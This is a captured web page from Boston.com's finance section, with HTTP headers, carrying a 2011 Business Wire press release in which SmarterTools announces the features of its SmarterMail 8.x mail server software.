Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:44:46 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:44:46 GMT
Age: 1
X-Cache: HIT from squid2.sv1.financialcontent.com
X-Cache-Lookup: HIT from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 35383

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<div class="widget">
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/news/newsread1.css);</style><div class="newsread clearfix">
<div class="title" id="newsItemTitle">SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference</div>
<div class="titleattributes clearfix">
<div class="pubdate"><div class="span date">Tuesday March 15, 2011 - 06:15 AM EDT</div></div>
<div class="channel"><a href="http://finance.boston.com/boston/news/channelinfo?ChannelID=3191">Business Wire News Releases</a></div>
<div class="releasedBy">Released By <a href="http://finance.boston.com/boston/news/releasedby?ReleasedBy=SmarterTools+Inc.">SmarterTools Inc.</a></div>
</div>



<div class="floatright">

<div class="fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>

<div class="sidebar clearfix">

<div class="companylogo"><img src="http://rss.financialcontent.com/images/feed/150px/2/72/272846.img" /></div>




<div class="share">
<div class="span label">Share:</div>
<!-- AddThis Button BEGIN -->
<script type="text/javascript">var addthis_pub="mdierolf";</script>
<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
<!-- AddThis Button END -->
</div>
<script type="text/javascript">
zoomLevel = 100;
</script>
<!--DOCUMENT NEWSENGINE TOOLS-->
<div class="mediatools">
<div class="mediatool" style="display:none">
<div class="label">Text Size:</div>
<div class="icon_txt_enlarge"><a href="#" onclick="zoomLevel += 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
<div class="icon_txt_shrink"><a href="#" onclick="zoomLevel -= 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
</div>




</div>
</div>

</div>




<div class="body" id="news_body">
<div id="mediaZoom">
<span xmlns="http://www.w3.org/1999/xhtml"><span><span/></span><span><p>
SmarterTools Inc. is proud to announce the release of SmarterMail 8.x, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=a+Microsoft+Exchange+alternative&amp;index=1&amp;md5=7d76eda161427115af85fc945239bff9" popable="true" rel="nofollow">a
Microsoft Exchange alternative</a> for any business. The latest release
of their popular <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=mail+server+software&amp;index=2&amp;md5=b564c275a54066759223e738b508bd55" popable="true" rel="nofollow">mail
server software</a> focuses on enhancing the user experience with
touch-and-go functionality, improved contact sharing, enhanced signature
options, new message notifications, password strength enforcement for
administrators and much more.
</p><p>
...The last few releases of the SmarterMail have centered on enhancing the
user experience,... said Tim Uzzanti, CEO of SmarterTools. ...With
SmarterMail 7.x we redesigned and simplified our webmail interface,
introduced the synchronization center and file storage, and improved
mailbox searching. With SmarterMail 8.x, we...ve continued to fine-tune
and simplify the user experience while adding even more functionality to
our award-winning mail server....
</p><p>
New features and enhancements in SmarterMail 8.x include:
</p><ul><li><b>Touch-and-go functionality</b> ... Emailing a contact, mapping an
address or adding an email address to your contacts list has never
been easier. SmarterMail 8.x introduces clickable addresses, phone
numbers and email addresses for click-to-map, click-to-call and
click-to-mail functionality in messages, contact details, calendar
items, tasks and notes.
</li><li><b>Improved contact sharing</b> ... Users can now download, save or send
contact details in .CSV or vCard format, making it easy to share the
email address or phone number of a friend or colleague in their
SmarterMail address book.
</li><li><b>New message notifications</b> ... Now users receive a notification
that they...ve received a new message no matter which section of the
interface they are viewing.
</li><li><b>Built-in filters for viewing messages</b> ... View read messages,
unread messages, replied to messages, forwarded messages or all
messages with attachments with the click of the mouse.
</li><li><b>Synchronization Center Translation </b>... The synchronization center
now detects the browser language and automatically translates the sync
info into that language, making it easier to provide info about
available sync protocols to international users.
</li><li><b>Password retrieval and compliancy options</b> ... When enabled, users
that can...t remember their password will receive an email to their
backup email address with instructions on resetting their password.
Plus, system administrators can use the new password compliance report
to identify users that don...t meet the specified password requirements
and send them a request to change their passwords.
</li><li><b>Improved performance </b>... Numerous optimizations to SmarterMail
8.x reduce disk I/O by an average of 25%. This includes better grid
controls, improved charting and an update to the Microsoft .NET 4.0
Framework.
</li><li><b>Improved administration </b>... With better spool management,
enhancements to IP binding settings, hard limit throttling and support
for SPF RR lookups, mail server administration is easier and more
convenient. Plus, system administrators have access to even more Web
services.
</li></ul><p>
SmarterMail is available at the SmarterTools website and through <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fpartners%2Fpartner-programs.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=authorized+resellers&amp;index=3&amp;md5=eecda7962c7be742b82516312b289374" popable="true" rel="nofollow">authorized
resellers</a>. A complete list of new features and improvements is
available by viewing the <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Freleasenotes%2Fv8.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=SmarterMail+8.x+release+notes&amp;index=4&amp;md5=c659640f16082fef51f6291b3a607ccb" popable="true" rel="nofollow">SmarterMail
8.x release notes</a>.
</p><p>
Follow us on Twitter: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Ftwitter.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=%40smartertools&amp;index=5&amp;md5=c9f7577c4e2744f5a5eb2eced46ec764" popable="true" rel="nofollow">@smartertools</a></p><p>
Watch our videos on YouTube: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;index=6&amp;md5=49ce4902c30a8a3499da6a058636f483" popable="true" rel="nofollow">http://www.youtube.com/smartertools</a></p><p>
Read our blog: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fblog.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fblog.smartertools.com&amp;index=7&amp;md5=f09b9ee5597016741dc2a3d48b77903a" popable="true" rel="nofollow">http://blog.smartertools.com</a></p><p>
About SmarterTools Inc.
</p><p>
Founded in 2003, SmarterTools Inc. is an information technology
management software company based in Phoenix, Arizona. SmarterTools
develops a <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Windows+mail+server&amp;index=8&amp;md5=753dfcf21359acd124f726ecf17ba3d3" popable="true" rel="nofollow">Windows
mail server</a>, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartertrack%2Fhelp-desk-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=customer+service+software&amp;index=9&amp;md5=3858e9ddaccf462e4a8dea61fcdcfbb6" popable="true" rel="nofollow">customer
service software</a>, and <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmarterstats%2Fweb-analytics-seo-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Web+log+analytics+and+SEO+software&amp;index=10&amp;md5=ee1830947b29223ebfa4d4bd225e4e56" popable="true" rel="nofollow">Web
log analytics and SEO software</a> that help companies communicate,
measure, and support their worldwide business operations. Additional
information about SmarterTools Inc. and the SmarterTools product line is
available at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=www.smartertools.com&amp;index=11&amp;md5=45670fe0032c618fc71f4715ff97e2fc" popable="true" rel="nofollow">www.smartertools.com</a>.
</p><p>
Microsoft Exchange and Windows are trademarks of Microsoft Corporation [<a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.marketwatch.com%2Fquotes%2Fmsft&amp;esheet=6647089&amp;lan=en-US&amp;anchor=MSFT&amp;index=12&amp;md5=ca906155f80a16d742609363657b0485" popable="true" rel="nofollow">MSFT</a>].
</p><p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&amp;sty=20110315005734r1&amp;sid=6434&amp;distro=ftp"/><span/></p></span></span> </div>
</div>
<script type="text/javascript">
function scanBody () {
document.FCON.loadLibraryCallback('HoverQuote', function() {
document.FCON.HoverQuote.scanTags(document.getElementById('news_body'));
});
}
setTimeout("scanBody()",50);
</script>

<div class="data contacts">
Contacts: <br /><br />
<fc:contacts xmlns="http://www.w3.org/1999/xhtml"><b>SmarterTools</b><br/>Derek Curtis<b>, </b>VP of Marketing,
623-434-8050<br/><a href="mailto:dcurtis@smartertools.com">dcurtis@smartertools.com</a></fc:contacts>
</div>


<div class="mediatool icon_print"><a href="#" onclick="window.print(); return false;">Print this story</a></div>
<div class="mediatool icon_email"><a href="#" onclick="emailAFriend(document.getElementById('newsItemTitle'),location.href,document.getElementById('newsItemTitle').innerHTML); return false;" >Email this story</a></div>
<div class="mediatool icon_pdf"><a href="http://finance.boston.com/boston/action/getnewspdf?GUID=17744398">Download PDF</a></div>
</div>



</div>

</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR3');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR4');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR5');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR6');
//--></script><!--End Ad Tag--></div>
<div class="cf"></div>
</div>
<div>
<div id="bottomLinks">
<ul class="gnavContainer">
<li><a rel="nofollow" href="http://www.boston.com/">Home</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/globe/">Today's Globe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/news/">News</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/business/">Business</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/sports/">Sports</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/ae/">A&amp;E</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/thingstodo/">Things to Do</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/travel/">Travel</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/cars/" class="cfied">Cars</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/jobs/" class="cfied">Jobs</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/realestate/" class="cfied">Homes</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/search/" class="cfied">Local Search</a></li>
</ul>
<ul id="bcomLinks">
<li class="first"><a rel="nofollow" href="http://www.boston.com/help/bostoncom_info/">Contact Boston.com</a></li> <li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/">Help</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mediakit/bgm/index.html">Advertise</a></li><li class="listPipe">|</li>
<li><a href="http://boston.monster.com/search.aspx?q=%22boston.com%22&amp;cy=us&amp;cnme=boston&amp;sid=40&amp;re=100&amp;jto=1">Work here</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/privacy_policy/">Privacy Policy</a></li><li class="listPipe">|</li>
<li><script language="JavaScript"><!--
signupLink();
//--></script><noscript><a href="http://members.boston.com/reg/login.do?dispatch=loginpage&amp;p1=Foot_ContactBostonCom_Newsletters">Newsletters</a></noscript></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/mobile/">Mobile</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/tools/rss/">RSS feeds</a></li><li class="listPipe">|</li>
<li><a href="http://spiderbites.boston.com/sitemap-service/Home.xml">Sitemap</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://www.boston.com/help/homepage/">Make Boston.com your homepage</a></li>
</ul>
<ul id="bglobeLinks">
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a></li><li class="listPipe">|</li>
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a></li><li class="listPipe">|</li>
